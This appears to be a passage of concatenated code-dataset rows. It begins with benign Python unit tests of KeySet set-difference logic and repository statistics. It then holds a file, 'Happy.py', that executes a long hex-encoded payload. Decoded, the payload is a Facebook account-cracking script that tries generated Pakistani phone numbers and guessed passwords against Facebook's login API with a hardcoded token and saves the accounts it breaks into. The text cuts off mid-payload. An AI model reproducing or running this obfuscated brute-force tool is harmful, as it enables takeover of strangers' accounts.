assert actual.represents_none()
def test_remove_none(self) -> None:
ks = KeySetAllExceptSome({'a', 'b'})
other = KeySetNone()
actual = ks.difference(other)
assert actual.represents_all_except_some()
assert actual.elements() == {'a', 'b'}
def test_remove_some_same_keys(self) -> None:
ks = KeySetAllExceptSome({'a', 'b'})
other = KeySetSome({'a', 'b'})
actual = ks.difference(other)
assert actual.represents_all_except_some()
assert actual.elements() == {'a', 'b'}
def test_remove_some_subset_keys(self) -> None:
ks = KeySetAllExceptSome({'a', 'b'})
other = KeySetSome({'a'})
actual = ks.difference(other)
assert actual.represents_all_except_some()
assert actual.elements() == {'a', 'b'}
def test_remove_some_superset_keys(self) -> None:
ks = KeySetAllExceptSome({'a', 'b'})
other = KeySetSome({'a', 'b', 'c'})
actual = ks.difference(other)
assert actual.represents_all_except_some()
assert actual.elements() == {'a', 'b', 'c'}
def test_remove_some_with_some_common_keys(self) -> None:
ks = KeySetAllExceptSome({'a', 'b'})
other = KeySetSome({'a', 'c'})
actual = ks.difference(other)
assert actual.represents_all_except_some()
assert actual.elements() == {'a', 'b', 'c'}
def test_remove_some_without_common_keys(self) -> None:
ks = KeySetAllExceptSome({'a', 'b'})
other = KeySetSome({'c', 'd'})
actual = ks.difference(other)
assert actual.represents_all_except_some()
assert actual.elements() == {'a', 'b', 'c', 'd'}
def test_remove_all_except_some_same_keys(self) -> None:
ks = KeySetAllExceptSome({'a', 'b'})
other = KeySetAllExceptSome({'a', 'b'})
actual = ks.difference(other)
assert actual.represents_none()
def test_remove_all_except_some_subset_keys(self) -> None:
ks = KeySetAllExceptSome({'a', 'b'})
other = KeySetAllExceptSome({'a'})
actual = ks.difference(other)
assert actual.represents_none()
def test_remove_all_except_some_superset_keys(self) -> None:
ks = KeySetAllExceptSome({'a', 'b'})
other = KeySetAllExceptSome({'a', 'b', 'c'})
actual = ks.difference(other)
assert actual.represents_some()
assert actual.elements() == {'c'}
def test_remove_all_except_some_with_some_common_keys(self) -> None:
ks = KeySetAllExceptSome({'a', 'b'})
other = KeySetAllExceptSome({'a', 'c'})
actual = ks.difference(other)
assert actual.represents_some()
assert actual.elements() == {'c'}
def test_remove_all_except_some_without_common_keys(self) -> None:
ks = KeySetAllExceptSome({'a', 'b'})
other = KeySetAllExceptSome({'c', 'd'})
actual = ks.difference(other)
assert actual.represents_some()
assert actual.elements() == {'c', 'd'}
| 37.228477
| 79
| 0.603576
| 1,276
| 11,243
| 5.095611
| 0.045455
| 0.14211
| 0.161489
| 0.196247
| 0.937404
| 0.932944
| 0.92956
| 0.905106
| 0.858505
| 0.858505
| 0
| 0.000947
| 0.248955
| 11,243
| 301
| 80
| 37.352159
| 0.769067
| 0.003825
| 0
| 0.762846
| 0
| 0
| 0.018757
| 0
| 0
| 0
| 0
| 0
| 0.343874
| 1
| 0.173913
| false
| 0
| 0.007905
| 0
| 0.185771
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a2e57f70ad7407cb93dd00f0986826a91ee2c0b7
| 142
|
py
|
Python
|
kevin/machine_learning/patch_for_numpy/axis_and_dim/__init__.py
|
cantbeblank96/kevin_toolbox
|
a258b2a42c9b4d042decb193354ecb7419bd837c
|
[
"MIT"
] | null | null | null |
kevin/machine_learning/patch_for_numpy/axis_and_dim/__init__.py
|
cantbeblank96/kevin_toolbox
|
a258b2a42c9b4d042decb193354ecb7419bd837c
|
[
"MIT"
] | null | null | null |
kevin/machine_learning/patch_for_numpy/axis_and_dim/__init__.py
|
cantbeblank96/kevin_toolbox
|
a258b2a42c9b4d042decb193354ecb7419bd837c
|
[
"MIT"
] | null | null | null |
from kevin.machine_learning.patch_for_numpy.axis_and_dim.transpose.get_inverse_of_transpose_index_ls import get_inverse_of_transpose_index_ls
| 71
| 141
| 0.93662
| 24
| 142
| 4.916667
| 0.708333
| 0.169492
| 0.20339
| 0.355932
| 0.474576
| 0.474576
| 0
| 0
| 0
| 0
| 0
| 0
| 0.028169
| 142
| 1
| 142
| 142
| 0.855072
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
a2fad2e9e41f09bbdd69fd38bf2bce0260249b7a
| 37,725
|
py
|
Python
|
Happy.py
|
Trey-Killer/without
|
5975618d0e6a57843d6d46c169b32f70b8743d8c
|
[
"Apache-2.0"
] | null | null | null |
Happy.py
|
Trey-Killer/without
|
5975618d0e6a57843d6d46c169b32f70b8743d8c
|
[
"Apache-2.0"
] | null | null | null |
Happy.py
|
Trey-Killer/without
|
5975618d0e6a57843d6d46c169b32f70b8743d8c
|
[
"Apache-2.0"
] | null | null | null |
import base64
exec(base64.b16decode('23212F7573722F62696E2F707974686F6E320A23636F64696E673D7574662D380A23426C61636B54696765722D4572726F723430340A23596F75547562653A54696D653420596F750A2357686174736170702B3932333033373333353131340A696D706F7274206F732C7379732C74696D652C6461746574696D652C72616E646F6D2C686173686C69622C72652C746872656164696E672C6A736F6E2C75726C6C69622C636F6F6B69656C69622C676574706173730A6F732E73797374656D2827726D202D7266202E74787427290A666F72206E20696E2072616E6765283130303030293A0A0A202020206E6D6272203D2072616E646F6D2E72616E64696E7428313131313131312C2039393939393939290A202020200A202020207379732E7374646F7574203D206F70656E28272E747874272C20276127290A0A202020207072696E74286E6D6272290A0A202020207379732E7374646F75742E666C75736828290A202020200A7472793A0A20202020696D706F72742072657175657374730A65786365707420496D706F72744572726F723A0A202020206F732E73797374656D28277069703220696E7374616C6C206D656368616E697A6527290A202020200A7472793A0A20202020696D706F7274206D656368616E697A650A65786365707420496D706F72744572726F723A0A202020206F732E73797374656D28277069703220696E7374616C6C207265717565737427290A2020202074696D652E736C6565702831290A202020206F732E73797374656D28275468656E20747970653A20707974686F6E322048617070792E707927290A0A696D706F7274206F732C7379732C74696D652C6461746574696D652C72616E646F6D2C686173686C69622C72652C746872656164696E672C6A736F6E2C75726C6C69622C636F6F6B69656C69622C72657175657374732C6D656368616E697A650A66726F6D206D756C746970726F63657373696E672E706F6F6C20696D706F727420546872656164506F6F6C0A66726F6D2072657175657374732E657863657074696F6E7320696D706F727420436F6E6E656374696F6E4572726F720A66726F6D206D656368616E697A6520696D706F72742042726F777365720A0A0A72656C6F616428737973290A7379732E73657464656661756C74656E636F64696E6728277574663827290A6272203D206D656368616E697A652E42726F7773657228290A62722E7365745F68616E646C655F726F626F74732846616C7365290A62722E7365745F68616E646C655F72656672657368286D656368616E697A652E5F687474702E485454505265667265736850726F636573736F7228292C6D61785F74696D653D31290A62722E61646468656164657273203D205B2827557365722D4167656E74272C20274F706572612F392E38302028416E64726F69643B204F70657261204D696E692F33322E302E323235342F38352E20553B206964292050726573746F2F322E31322E3432332056657273696F6E2F31322E313627295D0A62722E61646468656164657273203D205B2827757365722D6167656E74272C2744616C76696B2F312E362E3020284C696E75783B20553B20416E64726F696420342E342E323B204E583535204275696C642F4B4F543535303629205B4642414E2F464234413B464241562F3130362E302E302E32362E36383B464242562F34353930343136303B4642444D2F7B64656E736974793D332E302C77696474683D313038302C6865696768743D313932307D3B46424C432F69745F49543B464252562F34353930343136303B464243522F506F7374654D6F62696C653B46424D462F617375733B464242442F617375733B4642504E2F636F6D2E66616365626F6F6B2E6B6174616E613B464244562F415355535F5A303041443B464253562F352E303B46424F502F313B464243412F7838363A61726D656162692D7637613B5D27295D0A0A646566206B656C75617228293A0A097072696E7420275468616E6B732E270A096F732E7379732E6578697428290A0A646566206163616B2862293A0A2020202077203D2027616874647A6A63270A2020202064203D2027270A20202020666F72206920696E20783A0A202020202020202064202B3D202721272B775B72616E646F6D2E72616E64696E7428302C6C656E2877292D31295D2B690A2020202072657475726E20636574616B2864290A0A0A64656620636574616B2862293A0A2020202077203D2027616874647A6A63270A20202020666F72206920696E20773A0A20202020202020206A203D20772E696E6465782869290A2020202020202020783D20782E7265706C61636528272125732725692C275C3033335B25733B316D27257374722833312B6A29290A2020202078202B3D20275C3033335B306D270A2020202078203D20782E7265706C61636528272130272C275C3033335B306D27290A202020207379732E7374646F75742E777269746528782B275C6E27290A0A0A646566206A616C616E287A293A0A09666F72206520696E207A202B20275C6E273A0A09097379732E7374646F75742E77726974652865290A09097379732E7374646F75742E666C75736828290A090974696D652E736C6565702830303030302E31290A6465662074696B28293A0A09746974696B203D205B272E202020272C272E2E2020272C272E2E2E20275D0A09666F72206F20696E20746974696B3A0A09097072696E7428225C725C7831625B313B39336D426C61636B5469676572E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29692E29692E29692E29692E29692E29692E29692E296922E2E393925205C7831625B313B39336D222B6F292C3B7379732E7374646F75742E666C75736828293B74696D652E736C6565702831290A0A0A6261636B203D20300A6F6B73203D205B5D0A6964203D205B5D0A637062203D205B5D0A76756C6E6F74203D20225C3033335B33316D4E6F742056756C6E220A76756C6E203D20225C3033335B33326D56756C6E220A0A6F732E73797374656D2822636C65617222290A7072696E7420202222220A5C3033335B313B39316D2020205F0A5C3033335B313B39326D202028205C202020202020202020202020202020202E2E2D2D2D2D2D2E2E5F5F0A5C3033335B313B39336D2020205C2E272E20202020202020205F2E2D2D276020205B2020202720202720606060272D2E5F0A5C3033335B313B39346D20202020602E2060272D2E2E2D27272060202020202720202720272020202E20203B2020203B20602D2727272D2E2C5F5F2F7C2F5F0A5C3033335B313B39356D20202020202060272D2E3B2E2E2D2727607C272020602E2020272E202020203B202020202027202060202020202720202060272020602C0A5C3033335B313B39366D20202020202020202020202020202020205C20272020202E2020202027202E2020202020272020203B2020202E602020202E20272037205C0A5C3033335B313B39376D202020202020202020202020202020202020272E27202E20272D202E205C202020202E602020202E6020202E2020202E5C202020202060590A5C3033335B313B39316D2020202020202020202020202020202020202020272D2E27202E2020205D2E2020272020202C2020202027202020202F27602222273B3A270A5C3033335B313B39326D202020202020202020202020202020202020202020202F59202020272E5D20272D2E5F202F2020202027205F2E2D270A5C3033335B313B39336D202020202020202020202020202020202020202020205C275C5F2020203B202860272E272E2720202E222F0A5C3033335B313B39346D202020202020202020202020202020202020202020202027202960202F2020602E272020202E2D272E270A5C3033335B313B39356D202020202020202020202020202020202020202020202020275C20205C292E2720202E2D272D2D220A5C3033335B313B39366D2020202020202020202020202020202020202020202020202020602E20602C5F27600A5C3033335B313B39376D20202020202020202020202020202020202020202020202020202020602E5F5F2920204173482F736B0A5C3033335B313B39366DE29685E29685E29685E29685E29685E29685E29685E29685E0B991DBA9E2888628426C61636B546967657229E28886DBA9E0B991E29685E29685E29685E29685E29685E296850A5C3033335B313B39346D43726561746572E29EA35C3033335B313B39336D426C61636B54696765722D4572726F723430340A5C3033335B313B39346D5768617473617070E2988F20E29EA35C3033335B313B39336D2B3932333033373333353131340A5C3033335B313B39346D596F7574756265E29EA35C3033335B313B39336D54696D653420596F750A5C3033335B313B39346D425469676572E29EA34E6F742041204E616D6520497473204272616E64205C3033335B313B39326D4572726F723430340A5C3033335B313B39346D4E6F204C6F67696E204E656564E29EA3456E6A6F7920776974686F757420616E792070726F626C656D0A5C3033335B313B39356D42546967657220566572792053706565642053637269707420E29EA34F6E6C79206164642050414B20436F756E74727920636F64650A5C3033335B313B39366DE29685E29685E29685E29685E29685E29685E29685E29685E29685E0B991DBA9E28886284572726F7234303429E28886DBA9E0B991E29685E29685E29685E29685E29685E296850A2222220A0A232323234C6F676F232323230A0A6C6F676F31203D202222220A5C3033335B313B39316D2020202020202020202020205F2020202020205F0A5C3033335B313B39326D202020202020202020202028635C2D2E2D2D2F61290A5C3033335B313B39336D2020202020202020202020207C713A20702020202F5C5F2020202020202020202020205F5F5F5F5F0A5C3033335B313B39346D202020202020202020205F5F5C285F2F2020292E272020272D2D2D2E5F2E2D2D2D27602020202020272D2D2D2E5F5F0A5C3033335B313B39356D2020202020202020202F202028595F295F2F202020202020202020202020202F20202020202020203A205C2D2E5F205C0A5C3033335B313B39366D20212121212C2C2C205C5F2929272D273B2020202020202020202020202028202020202020205F2F2020205C2020275C5C5F0A5C3033335B313B39376D212149492121212121494949492C2C205C5F202020202020202020202020205C20202020202F2020202020205C5F2020272E5C0A5C3033335B313B39316D20214949736E644949494949212121212C2C5C20202020202F5F2020202020205C2020207C2D2D2D2D2E5F5F5F20272D2E205C272E5F5F0A5C3033335B313B39326D20212121494949494949494949494949494949495C2020207C20272D2D2E5F2E2D2720205F29202020202020205C20207C202060272D2D270A5C3033335B313B39336D202020202027272721212121494949494949492F2020202E272C2C2028285F5F5F2E2D272020202020202020202F202F0A5C3033335B313B39346D2020202020202020202020272727212121212F20205F2F212121214949494949494921212121212C2C2C2C2C3B2C3B2C2C2C2E2E2E2E2E0A5C3033335B313B39356D20202020202020202020202020202020207C202F49494949494949494949494949494949494949494949494949494949494949494949490A5C3033335B313B39366D20202020202020202020202020202020207C205C20202027274949494949494949494949494949494949494949494949494949494949494949490A5C3033335B313B39376D20202020202020202020202020202020205C5F2C2920202020202727272727212121214949494949494949494949494949494921212121212121210A5C3033335B313B39376D20202020202020202020202020202020202020202020202020202020202020202020202727272727272727272721212121212121212121212121210A5C3033335B313B39366DE29685E29685E29685E29685E29685E29685E29685E29685E0B991DBA9E2888628426C61636B546967657229E28886DBA9E0B991E29685E29685E29685E29685E29685E296850A5C3033335B313B39346D43726561746572E29EA35C3033335B313B39336D426C61636B54696765722D4572726F723430340A5C3033335B313B39346D5768617473617070E2988F20E29EA35C3033335B313B39336D2B3932333033373333353131340A5C3033335B313B39346D596F7574756265E29EA35C3033335B313B39336D54696D653420596F750A5C3033335B313B39346D425469676572E29EA34E6F742041204E616D6520497473204272616E64205C3033335B313B39326D4572726F723430340A5C3033335B313B39346D4E6F204C6F67696E204E656564E29EA3456E6A6F7920776974686F757420616E792070726F626C656D0A5C3033335B313B39356D42546967657220566572792053706565642053637269707420E29EA34F6E6C79206164642050414B20436F756E74727920636F64650A5C3033335B313B39366DE29685E29685E29685E29685E29685E29685E29685E29685E29685E0B991DBA9E28886284572726F7234303429E28886DBA9E0B991E29685E29685E29685E29685E29685E296850A2222220A6C6F676F32203D202222220A5C3033335B313B39316D20202020202020202020202020202020202020202C2E0A5C3033335B313B39326D2020202020202020202020202020202020202C5F3E20602E2020202C273B0A5C3033335B313B39336D20202020202020202020202020202C2D602720202020202060272020202760272E5F0A5C3033335B313B39346D20202020202020202020202C2C2D29202D2D2D2E5F2020207C2020202E2D2D2D2727602D292C2E0A5C3033335B313B39356D2020202020202020202C27202020202020602E20205C20203B20202F2020205F2C272020202020602C0A5C3033335B313B39366D2020202020202C2D2D27205F5F5F5F202020202020205C2020202720202C27202020205F5F5F2020602D2C0A5C3033335B313B39376D20202020205F3E2020202F2D2D2E20602D2E20202020202020202020202020202E2D272E2D2D5C2020205C5F5F0A5C3033335B313B39376D20202020272D2C20202820202020602E2020602E2C607E205C7E272D2E202C27202C272020202029202020205F5C0A5C3033335B313B39366D202020205F3C202020205C20202020205C202C27202027292029202020602E202F20202020202F202020203C2C2E0A5C3033335B313B39356D202C2D272020205F2C20205C202020202C272020202028202F202020202020602E202020202F2020202020202020602D2C0A5C3033335B313B39346D20602D2E2C2D272020202020602E2C272020202020202060202020202020202020602E2C272020605C202020202C2D270A5C3033335B313B39336D20202C27202020202020205F20202F2020202C2C2C2020202020202C2C2C20202020205C2020202020602D2E20602D2E5F0A5C3033335B313B39326D202F2D2C20202020202C2720203B20202027205F205C202020202F205F206020202020203B20602E20202020206028602D5C0A5C3033335B313B39316D20202F2D2C20202020202020203B20202020286F29202020202020286F292020202020203B202020202020202020206027602C0A5C3033335B313B39316D2C7E2D2720202C2D27202020205C2020202020272020202020202020602020202020202F20202020205C2020202020203C5F0A5C3033335B313B39326D2F2D2E202C2720202020202020205C202020202020202020202020202020202020202F202020202020205C20202020202C2D270A5C3033335B313B39336D202027602C20202020202C27202020602D2F202020202020202020202020205C2D2720602E202020202020602D2E203C0A5C3033335B313B39346D2020202F5F202020202F2020202020202F202020285F20202020205F292020205C202020205C20202020202020202020602C0A5C3033335B313B39356D2020202020602D2E5F3B20202C27207C20202E3A3A2E602D2E2D27203A2E2E20207C20202020202020602D2E202020205F5C0A5C3033335B313B39366D202020202020205F2F202020202020205C2020603A3A202C5E2E203A2E3A27202F20602E20202020202020205C2C2D270A5C3033335B313B39376D202020202027602E2020202C2D2720202F602D2E2E2D272D2E2D602D2E2E2D275C202020202020202020202020602D2E0A5C3033335B313B39376D202020202020203E5F202F20202020203B2020285C2F28202720295C2F2920203B2020202020602D2E202020205F3C0A5C3033335B313B39366D202020202020202C2D27202020202020602E20205C602D5E5E5E2D272F20202C2720202020202020205C205F3C0A5C3033335B313B39356D2020202020202020602D2C20202C27202020602E206020202020202C27202020602D2E2020203C60270A5C3033335B313B39346D2020202020202020202027292020202020202020602E5F2E2C2C5F2E2720202020202020205C202C2D270A5C3033335B313B39336D2020202020202020202020272E5F202020202020202027602760272020205C202020202020203C0A5C3033335B313B39326D20202020202020202020202020203E2020202C27202020202020202C202020602D2E2020203C60270A5C3033335B313B39316D0A5C3033335B313B39316D2020205F5F5F205F5F5F5F2020205F5F5F205F5F5F5F205F5F5F5F5F5F205F5F5F5F205F5F5F5F20205F5F5F5F5F205F5F205F5F205F20205F2020200A5C3033335B313B39326D20202F205F205C5F5F5F205C202F205F205C5F5F5F205C5F5F5F5F20207C5F5F5F205C5F5F5F205C7C205F5F5F5F2F5F202F5F207C207C7C207C20200A5C3033335B313B39336D207C207C207C207C5F5F29207C207C207C207C5F5F29207C20202F202F20205F5F29207C5F5F29207C207C5F5F20207C207C7C207C207C7C207C5F200A5C3033335B313B39346D207C207C207C207C5F5F203C7C207C207C207C5F5F203C20202F202F20207C5F5F203C7C5F5F203C7C5F5F5F205C207C207C7C207C5F5F2020205F7C0A5C3033335B313B39356D207C207C5F7C207C5F5F29207C207C5F7C207C5F5F29207C2F202F2020205F5F5F29207C5F5F29207C5F5F5F29207C7C207C7C207C20207C207C20200A5C3033335B313B39366D20205C5F5F5F2F5F5F5F5F2F205C5F5F5F2F5F5F5F5F2F2F5F2F2020207C5F5F5F5F2F5F5F5F5F2F7C5F5F5F5F2F207C5F7C7C5F7C20207C5F7C2020200A0A5C3033335B313B39366DE29685E29685E29685E29685E29685E29685E29685E29685E0B991DBA9E2888628426C61636B546967657229E28886DBA9E0B991E29685E29685E29685E29685E29685E296850A5C3033335B313B39346D43726561746572E29EA35C3033335B313B39336D426C61636B54696765722D4572726F723430340A5C3033335B313B39346D5768617473617070E2988F20E29EA35C3033335B313B39336D2B3932333033373333353131340A5C3033335B313B39346D596F7574756265E29EA35C3033335B313B39336D54696D653420596F750A5C3033335B313B39346D425469676572E29EA34E6F742041204E616D6520497473204272616E64205C3033335B313B39326D4572726F723430340A5C3033335B313B39346D4E6F204C6F67696E204E656564E29EA3456E6A6F7920776974686F757420616E792070726F626C656D0A5C3033335B313B39356D42546967657220566572792053706565642053637269707420E29EA34F6E6C79206164642050414B20436F756E74727920636F64650A5C3033335B313B39366DE29685E29685E29685E29685E29685E29685E29685E29685E29685E0B991DBA9E28886284572726F7234303429E28886DBA9E0B991E29685E29685E29685E29685E29685E296850A0A2222220A0A436F727265637450617373636F6465203D20223033303337333335313134220A0A6C6F6F70203D202774727565270A7768696C6520286C6F6F70203D3D20277472756527293A0A2020202070617373636F6465203D207261775F696E70757428225C3033335B313B39326D5B3F5D205C7831625B313B39376D50415353574F5244205C7831625B313B39376D3A2022290A202020206966202870617373636F6465203D3D20436F727265637450617373636F6465293A0A2020202020202020202020207072696E74202222220A2020202020202020202020205C3033335B313B39326D57656C636F6D6520426C61636B5469676572205A6F6E650A2020202020202020202020202020202020202222220A2020202020202020202020206C6F6F70203D202766616C7365270A20202020656C73653A0A2020202020202020202020207072696E7420225C3033335B313B39316DE298A0EFB88F57524F4E47220A2020202020202020202020206F732E73797374656D28277864672D6F70656E2068747470733A2F2F7777772E796F75747562652E636F6D2F6368616E6E656C2F554371417941454F656461446C4656735A4672617650707727290A0A2323232323204C4943454E53452023232323230A233D3D3D3D3D3D3D3D3D3D3D3D3D3D3D3D3D230A646566206C6973656E736928293A0A202020206F732E73797374656D2827636C65617227290A202020206C6F67696E28290A232323236C6F67696E2323232323232323230A646566206C6F67696E28293A0A202020206F732E73797374656D2827636C65617227290A202020207072696E74206C6F676F310A202020207072696E7420225C3033335B313B39336D5B315D5C7831625B313B39346D537461727420636C6F6E696E672028206E6F206C6F67696E2029220A2020202074696D652E736C65657028302E3035290A202020207072696E7420275C7831625B313B39336D5B305D5C3033335B313B39346D20457869742028436F6D696E6720536F6F6E29270A2020202070696C69685F6C6F67696E28290A0A6465662070696C69685F6C6F67696E28293A0A202020207065616B203D207261775F696E70757428225C6E5C3033335B313B39356D43484F4F53453A205C3033335B313B39356D22290A202020206966207065616B203D3D22223A0A20202020202020207072696E7420225C7831625B313B39356D46696C6C20496E20436F72726563746C79220A202020202020202070696C69685F6C6F67696E28290A20202020656C6966207065616B203D3D2231223A0A20202020202020205A65656B28290A646566205A65656B28293A0A202020206F732E73797374656D2827636C65617227290A202020207072696E74206C6F676F310A202020207072696E7420275C7831625B313B39346D5B315D20426C61636B546967657220537461727420437261636B696E67270A2020202074696D652E736C65657028302E3035290A202020207072696E7420275C7831625B313B39346D5B305D205C3033335B313B39336D204261636B270A2020202074696D652E736C65657028302E3035290A20202020616374696F6E28290A0A64656620616374696F6E28293A0A202020207065616B203D207261775F696E70757428275C6E5C3033335B313B39356D43484F4F53453A5C3033335B313B39376D27290A202020206966207065616B203D3D27273A0A20202020202020207072696E7420275B215D2046696C6C20496E20436F72726563746C79270A2020202020202020616374696F6E28290A20202020656C6966207065616B203D3D2231223A20202020202020202020202020200A20202020202020206F732E73797374656D2822636C65617222290A20202020202020207072696E74206C6F676F320A20202020202020207072696E742022456E74657220616E792050616B697374616E69204D6F62696C6520636F6465204E756D626572222B275C6E270A20202020202020207072696E742027426C61636B546967657220456E74657220616E7920636F6465203120746F203439270A20202020202020207472793A0A20202020202020202020202063203D207261775F696E70757428225C3033335B313B39366D43484F4F5345203A2022290A2020202020202020202020206B3D223033220A20202020202020202020202069646C697374203D2028272E74787427290A202020202020202020202020666F72206C696E6520696E206F70656E2869646C6973742C227222292E726561646C696E657328293A0A2020202020202020202020202020202069642E617070656E64286C696E652E73747269702829290A202020202020202065786365707420494F4572726F723A0A2020202020202020202020207072696E742028225B215D2046696C65204E6F7420466F756E6422290A2020202020202020202020207261775F696E70757428225C6E5B204261636B205D22290A202020202020202020202020626C61636B6D616669617828290A20202020656C6966207065616B203D3D2730273A0A20202020202020206C6F67696E28290A20202020656C73653A0A20202020202020207072696E7420275B215D2046696C6C20496E20436F72726563746C79270A2020202020202020616374696F6E28290A202020207072696E742035302A20275C3033335B313B39316D2D270A20202020787878203D20737472286C656E28696429290A202020206A616C616E2028275C3033335B313B39316D20546F74616C20696473206E756D6265723A20272B787878290A202020206A616C616E2028275C3033335B313B39326D436F646520796F752063686F6F73653A20272B63290A202020206A616C616E2028225C3033335B313B39326D426C61636B5469676572E29688E29688E29688E29688E29688E29688E29692E29692E296922E2E393925537461727420437261636B696E672E2E2E22290A202020206A616C616E2028225C3033335B313B39326D546F2053746F702050726F63657373205072657373204374726C2B7A22290A202020207072696E742035302A20275C3033335B313B39316D2D270A20202020646566206D61696E28617267293A0A2020202020202020676C6F62616C206370622C6F6B730A202020202020202075736572203D206172670A20202020202020207472793A0A2020202020202020202020206F732E6D6B64697228277361766527290A2020202020202020657863657074204F534572726F723A0A202020202020202020202020706173730A20202020202020207472793A0A2020202020202020202020207061737331203D20757365720A20202020202020202020202064617461203D2062722E6F70656E282768747470733A2F2F622D6170692E66616365626F6F6B2E636F6D2F6D6574686F642F617574682E6C6F67696E3F6163636573735F746F6B656E3D32333737353939303935393136353525323532353743306631343061616265646662363561633237613733396564316132323633623126666F726D61743D6A736F6E2673646B5F76657273696F6E3D3126656D61696C3D27202B6B2B632B757365722B2027266C6F63616C653D656E5F55532670617373776F72643D27202B207061737331202B20272673646B3D696F732667656E65726174655F73657373696F6E5F636F6F6B6965733D31267369673D336635353566393866623631666364376161306334346635386635323265666D27290A20202020202020202020202071203D206A736F6E2E6C6F61642864617461290A202020202020202020202020696620276163636573735F746F6B656E2720696E20713A0A202020202020202020202020202020207072696E7420275C7831625B313B39326D284F4B29202027202B206B202B2063202B2075736572202B202720207C202027202B2070617373312020202020202020202020202020202020202020202020202020202020202020202020202020200A202020202020202020202020202020206F6B62203D206F70656E2827736176652F636C6F6E65642E747874272C20276127290A202020202020202020202020202020206F6B622E7772697465286B2B632B757365722B70617373312B275C6E27290A202020202020202020202020202020206F6B622E636C6F736528290A202020202020202020202020202020206F6B732E617070656E6428632B757365722B7061737331290A202020202020202020202020656C73653A0A20202020202020202020202020202020696620277777772E66616365626F6F6B2E636F6D2720696E20715B276572726F725F6D7367275D3A0A20202020202020202020202020202020202020207072696E7420275C3033335B313B39376D284350292027202B206B202B2063202B2075736572202B202720207C202027202B2070617373310A2020202020202020202020202020202020202020637073203D206F70656E2827736176652F636C6F6E65642E747874272C20276127290A20202020202020202020202020202020202020206370732E7772697465286B2B632B757365722B70617373312B275C6E27290A20202020202020202020202020202020202020206370732E636C6F736528290A20202020202020202020202020202020202020206370622E617070656E6428632B757365722B7061737331290A20202020202020202020202020202020656C73653A0A20202020202020202020202020202020202020207061737332203D206B202B2063202B20757365720A202020202020202020202020202020202020202064617461203D2062722E6F70656E282768747470733A2F2F622D6170692E66616365626F6F6B2E636F6D2F6D6574686F642F617574682E6C6F67696E3F6163636573735F746F6B656E3D32333737353939303935393136353525323532353743306631343061616265646662363561633237613733396564316132323633623126666F726D61743D6A736F6E2673646B5F76657273696F6E3D3126656D61696C3D27202B6B2B632B757365722B2027266C6F63616C653D656E5F55532670617373776F72643D27202B207061737332202B20272673646B3D696F732667656E65726174655F73657373696F6E5F636F6F6B6965733D31267369673D336635353566393866623631666364376161306334346635386635323265666D27290A202020202020202020202020202020202020202071203D206A736F6E2E6C6F61642864617461290A2020202020202020202020202020202020202020696620276163636573735F746F6B656E2720696E20713A0A2020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39326D284F4B29202027202B206B202B2063202B2075736572202B20202720207C202027202B2070617373320A2020202020202020202020202020202020202020202020206F6B62203D206F70656E2827736176652F636C6F6E65642E747874272C20276127290A2020202020202020202020202020202020202020202020206F6B622E7772697465286B2B632B757365722B70617373322B275C6E27290A2020202020202020202020202020202020202020202020206F6B622E636C6F736528290A2020202020202020202020202020202020202020202020206F6B732E617070656E6428632B757365722B7061737332290A2020202020202020202020202020202020202020656C73653A0A202020202020202020202020202020202020202020202020696620277777772E66616365626F6F6B2E636F6D2720696E20715B276572726F725F6D7367275D3A0A202020202020202020202020202020202020202020202020202020207072696E7420275C3033335B313B39376D284350292027202B206B202B2063202B2075736572202B202720207C202027202B2070617373320A20202020202020202020202020202020202020202020202020202020637073203D206F70656E2827736176652F636C6F6E65642E747874272C20276127290A202020202020202020202020202020202020202020202020202020206370732E7772697465286B2B632B757365722B70617373322B275C6E27290A202020202020202020202020202020202020202020202020202020206370732E636C6F736528290A202020202020202020202020202020202020202020202020202020206370622E617070656E6428632B757365722B7061737332290A202020202020202020202020202020202020202020202020656C73653A0A2020202020202020202020202020202020202020202020202020202070617373333D22303030373836220A2020202020202020202020202020202020202020202020202020202064617461203D2062722E6F70656E282768747470733A2F2F622D6170692E66616365626F6F6B2E636F6D2F6D6574686F642F617574682E6C6F67696E3F6163636573735F746F6B656E3D32333737353939303935393136353525323532353743306631343061616265646662363561633237613733396564316132323633623126666F726D61743D6A736F6E2673646B5F76657273696F6E3D3126656D61696C3D27202B6B2B632B757365722B2027266C6F63616C653D656E5F55532670617373776F72643D27202B207061737333202B20272673646B3D696F732667656E65726174655F73657373696F6E5F636F6F6B6965733D31267369673D336635353566393866623631666364376161306334346635386635323265666D27290A2020202020202020202020202020202020202020202020202020202071203D206A736F6E2E6C6F61642864617461290A20202020202020202020202020202020202020202020202020202020696620276163636573735F746F6B656E2720696E20713A0A20202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39326D284F4B29202027202B206B202B2063202B2075736572202B202720207C202027202B2070617373330A20202020202020202020202020202020202020202020202020202020202020206F6B62203D206F70656E2827736176652F636C6F6E65642E747874272C20276127290A20202020202020202020202020202020202020202020202020202020202020206F6B622E7772697465286B2B632B757365722B70617373332B275C6E27290A20202020202020202020202020202020202020202020202020202020202020206F6B622E636C6F736528290A20202020202020202020202020202020202020202020202020202020202020206F6B732E617070656E6428632B757365722B7061737333290A20202020202020202020202020202020202020202020202020202020656C73653A0A2020202020202020202020202020202020202020202020202020202020202020696620277777772E66616365626F6F6B2E636F6D2720696E20715B276572726F725F6D7367275D3A0A2020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C3033335B313B39376D284350292027202B206B202B2063202B2075736572202B202720207C202027202B207061737333200A202020202020202020202020202020202020202020202020202020202020202020202020637073203D206F70656E2827736176652F636C6F6E65642E747874272C20276127290A2020202020202020202020202020202020202020202020202020202020202020202020206370732E7772697465286B2B632B757365722B70617373332B275C6E27290A2020202020202020